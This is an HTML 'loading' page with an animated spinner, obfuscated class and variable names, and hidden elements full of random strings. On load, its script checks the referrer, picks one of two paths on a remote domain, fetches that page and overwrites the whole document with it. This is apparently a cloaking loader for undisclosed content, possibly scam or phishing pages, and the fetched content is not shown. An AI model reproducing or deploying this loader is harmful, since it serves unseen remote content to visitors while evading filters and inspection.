<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oYDo92tgOR {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oYDo92tgOR .cWP8htGCur {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oYDo92tgOR .content {
            line-height: 50px;
            text-align: center
        }

        .oYDo92tgOR .img {
            width: 100%
        }

        .oYDo92tgOR .b2GiQZFQ1k {
            text-align: center
        }

        .oYDo92tgOR .b2GiQZFQ1k span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oYDo92tgOR .b2GiQZFQ1k span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oYDo92tgOR .b2GiQZFQ1k span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oYDo92tgOR .b2GiQZFQ1k span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oYDo92tgOR .b2GiQZFQ1k span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oYDo92tgOR .b2GiQZFQ1k span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oYDo92tgOR .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NqIF9ly5lys(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OEux3np = NqIF9ly5lys('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OEux3np +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OEux3np +".html?a=share";
		}
		
        VTcLLN=url+"#"+new Date().getTime();
        VTcLLN && function() {
            $.get(VTcLLN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Jd99XwB21JqYfildnakpATw1Didoiv1iyQ</span>
<span style='display:none'>Jd99XwB21JqYfildnakpATw1Didoiv1iyQ</span>
<ul style='display:none' >brldBZhtLdHa5mIgROzyy</ul>
<img  src='' style='display:none'>
<span style='display:none'>Jd99XwB21JqYfildnakpATw1Didoiv1iyQ</span>
<h1 style='display:none' >veEzaPcBva0I0RAxBXysMKfONVyORhkon4fT4dGRx8YPO5AeotE21JfM8az4P6a0iRUfi3MWVOm</h1>
<li style='display:none' >UbXEfu3NFKwTgFShDuEUTq8UtL</li>
<b style='display:none' >iyGqkvoqJ5CzzdPN5pyoTxgglcoIObVhBRDQNfzK19LeD0Fvzftfe83AaVLCTSH6rCoDxsJLs73d1</b>
<a  href='#' style='display:none'>kPjiIs8d4eoomKfJV3Vw2cZVoheOx0</a><div class="oYDo92tgOR">
    <div class="cWP8htGCur">
        <div class="b2GiQZFQ1k">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >Gvmj7bTwi0Rf</b>
<a  href='#' style='display:none'>ev833X1crpIrEv3a79h7iRiTA9</a>
<ul style='display:none' >A9lwuwEzd47UZpqjvubE3O1LEVZAIV5W8gwzcJA5w</ul></body>
</html>